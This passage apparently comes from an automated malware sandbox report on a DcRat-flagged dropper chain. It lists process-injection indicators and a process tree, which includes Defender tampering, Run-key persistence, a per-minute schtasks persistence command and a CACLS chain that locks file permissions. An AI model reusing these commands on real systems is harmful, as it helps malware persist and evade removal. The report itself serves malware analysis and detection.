Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeDebugPrivilege	1400	32DB.exe
Token: SeDebugPrivilege	6056	34B0.exe
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeDebugPrivilege	232	powershell.exe
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE
Token: SeShutdownPrivilege	2636	Explorer.EXE
Token: SeCreatePagefilePrivilege	2636	Explorer.EXE

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe
4624	msedge.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2636	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3832 wrote to memory of 2208	3832	file.exe	86
PID 3832 wrote to memory of 2208	3832	file.exe	86
PID 3832 wrote to memory of 2208	3832	file.exe	86
PID 2208 wrote to memory of 3944	2208	Lu4ua02.exe	87
PID 2208 wrote to memory of 3944	2208	Lu4ua02.exe	87
PID 2208 wrote to memory of 3944	2208	Lu4ua02.exe	87
PID 3944 wrote to memory of 5028	3944	mY0Gp03.exe	88
PID 3944 wrote to memory of 5028	3944	mY0Gp03.exe	88
PID 3944 wrote to memory of 5028	3944	mY0Gp03.exe	88
PID 5028 wrote to memory of 988	5028	GQ6tR88.exe	89
PID 5028 wrote to memory of 988	5028	GQ6tR88.exe	89
PID 5028 wrote to memory of 988	5028	GQ6tR88.exe	89
PID 988 wrote to memory of 3784	988	1ga19vi8.exe	90
PID 988 wrote to memory of 3784	988	1ga19vi8.exe	90
PID 988 wrote to memory of 3784	988	1ga19vi8.exe	90
PID 988 wrote to memory of 1608	988	1ga19vi8.exe	91
PID 988 wrote to memory of 1608	988	1ga19vi8.exe	91
PID 988 wrote to memory of 1608	988	1ga19vi8.exe	91
PID 988 wrote to memory of 1608	988	1ga19vi8.exe	91
PID 988 wrote to memory of 1608	988	1ga19vi8.exe	91
PID 988 wrote to memory of 1608	988	1ga19vi8.exe	91
PID 988 wrote to memory of 1608	988	1ga19vi8.exe	91
PID 988 wrote to memory of 1608	988	1ga19vi8.exe	91
PID 5028 wrote to memory of 3664	5028	GQ6tR88.exe	95
PID 5028 wrote to memory of 3664	5028	GQ6tR88.exe	95
PID 5028 wrote to memory of 3664	5028	GQ6tR88.exe	95
PID 3664 wrote to memory of 4220	3664	2Vs6741.exe	97
PID 3664 wrote to memory of 4220	3664	2Vs6741.exe	97
PID 3664 wrote to memory of 4220	3664	2Vs6741.exe	97
PID 3664 wrote to memory of 4024	3664	2Vs6741.exe	98
PID 3664 wrote to memory of 4024	3664	2Vs6741.exe	98
PID 3664 wrote to memory of 4024	3664	2Vs6741.exe	98
PID 3664 wrote to memory of 4024	3664	2Vs6741.exe	98
PID 3664 wrote to memory of 4024	3664	2Vs6741.exe	98
PID 3664 wrote to memory of 4024	3664	2Vs6741.exe	98
PID 3664 wrote to memory of 4024	3664	2Vs6741.exe	98
PID 3664 wrote to memory of 4024	3664	2Vs6741.exe	98
PID 3664 wrote to memory of 4024	3664	2Vs6741.exe	98
PID 3664 wrote to memory of 4024	3664	2Vs6741.exe	98
PID 3944 wrote to memory of 2952	3944	mY0Gp03.exe	105
PID 3944 wrote to memory of 2952	3944	mY0Gp03.exe	105
PID 3944 wrote to memory of 2952	3944	mY0Gp03.exe	105
PID 2952 wrote to memory of 4936	2952	3fc11QJ.exe	106
PID 2952 wrote to memory of 4936	2952	3fc11QJ.exe	106
PID 2952 wrote to memory of 4936	2952	3fc11QJ.exe	106
PID 2952 wrote to memory of 4936	2952	3fc11QJ.exe	106
PID 2952 wrote to memory of 4936	2952	3fc11QJ.exe	106
PID 2952 wrote to memory of 4936	2952	3fc11QJ.exe	106
PID 2208 wrote to memory of 4020	2208	Lu4ua02.exe	110
PID 2208 wrote to memory of 4020	2208	Lu4ua02.exe	110
PID 2208 wrote to memory of 4020	2208	Lu4ua02.exe	110
PID 4020 wrote to memory of 4612	4020	4df752kv.exe	113
PID 4020 wrote to memory of 4612	4020	4df752kv.exe	113
PID 4020 wrote to memory of 4612	4020	4df752kv.exe	113
PID 4020 wrote to memory of 4612	4020	4df752kv.exe	113
PID 4020 wrote to memory of 4612	4020	4df752kv.exe	113
PID 4020 wrote to memory of 4612	4020	4df752kv.exe	113
PID 4020 wrote to memory of 4612	4020	4df752kv.exe	113
PID 4020 wrote to memory of 4612	4020	4df752kv.exe	113
PID 3832 wrote to memory of 1348	3832	file.exe	116
PID 3832 wrote to memory of 1348	3832	file.exe	116
PID 3832 wrote to memory of 1348	3832	file.exe	116
PID 1348 wrote to memory of 1688	1348	5NE0QX3.exe	117
PID 1348 wrote to memory of 1688	1348	5NE0QX3.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:2636
- C:\Users\Admin\AppData\Local\Temp\file.exe
  "C:\Users\Admin\AppData\Local\Temp\file.exe"
  2⤵
  - DcRat
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3832
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lu4ua02.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lu4ua02.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2208
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mY0Gp03.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mY0Gp03.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:3944
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GQ6tR88.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GQ6tR88.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:5028
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ga19vi8.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ga19vi8.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:988
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:3784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        Modifies Windows Defender Real-time Protection settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 608
        7⤵
        Program crash
        
        PID:3108
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Vs6741.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Vs6741.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3664
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:4220
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:4024
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 540
        8⤵
        Program crash
        
        PID:2452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3664 -s 608
        7⤵
        Program crash
        
        PID:4556
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3fc11QJ.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3fc11QJ.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2952
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:4936
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 568
        6⤵
        Program crash
        
        PID:636
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4df752kv.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4df752kv.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4020
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:4612
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 572
        5⤵
        Program crash
        
        PID:3056
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5NE0QX3.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5NE0QX3.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1348
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8368.tmp\8369.tmp\836A.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5NE0QX3.exe"
      4⤵
      PID:1688
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        
        PID:4800
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffcd03146f8,0x7ffcd0314708,0x7ffcd0314718
        6⤵
        
        PID:4668
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,8953066975714721188,8835861764268806113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4460
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,8953066975714721188,8835861764268806113,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
        6⤵
        
        PID:2792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4624
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffcd03146f8,0x7ffcd0314708,0x7ffcd0314718
        6⤵
        
        PID:4412
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
        6⤵
        
        PID:3828
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
        6⤵
        
        PID:1972
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1496
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
        6⤵
        
        PID:376
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
        6⤵
        
        PID:3848
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:1
        6⤵
        
        PID:5148
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
        6⤵
        
        PID:5444
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5624 /prefetch:8
        6⤵
        
        PID:6124
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5624 /prefetch:8
        6⤵
        
        PID:6140
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
        6⤵
        
        PID:5144
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
        6⤵
        
        PID:5216
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
        6⤵
        
        PID:5400
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
        6⤵
        
        PID:5404
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
        6⤵
        
        PID:1600
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
        6⤵
        
        PID:5964
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8599480106418473347,11860975574413703639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
        6⤵
        
        PID:5832
- C:\Users\Admin\AppData\Local\Temp\DC37.exe
  C:\Users\Admin\AppData\Local\Temp\DC37.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1764
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WM4JB1eP.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WM4JB1eP.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5716
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qy4Cp1KT.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qy4Cp1KT.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:5748
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HI5pY7wp.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\HI5pY7wp.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5836
- C:\Users\Admin\AppData\Local\Temp\DDFD.exe
  C:\Users\Admin\AppData\Local\Temp\DDFD.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5784
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5908
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5916
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5924
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 428
    3⤵
    - Program crash
    PID:1200
- C:\Users\Admin\AppData\Local\Temp\DFB3.bat
  "C:\Users\Admin\AppData\Local\Temp\DFB3.bat"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5864
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E08C.tmp\E08D.tmp\E08E.bat C:\Users\Admin\AppData\Local\Temp\DFB3.bat"
    3⤵
    PID:1408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:2108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcd03146f8,0x7ffcd0314708,0x7ffcd0314718
        5⤵
        
        PID:2308
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
      4⤵
      PID:5804
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffcd03146f8,0x7ffcd0314708,0x7ffcd0314718
        5⤵
        
        PID:5872
- C:\Users\Admin\AppData\Local\Temp\E293.exe
  C:\Users\Admin\AppData\Local\Temp\E293.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:6044
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 216
    3⤵
    - Program crash
    PID:408
- C:\Users\Admin\AppData\Local\Temp\E3AD.exe
  C:\Users\Admin\AppData\Local\Temp\E3AD.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Windows security modification
  - Suspicious use of AdjustPrivilegeToken
  PID:5556
- C:\Users\Admin\AppData\Local\Temp\E564.exe
  C:\Users\Admin\AppData\Local\Temp\E564.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:1784
- - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
    "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:5412
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:3088
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
      4⤵
      PID:5072
    - - C:\Windows\SysWOW64\cmd.exe
        
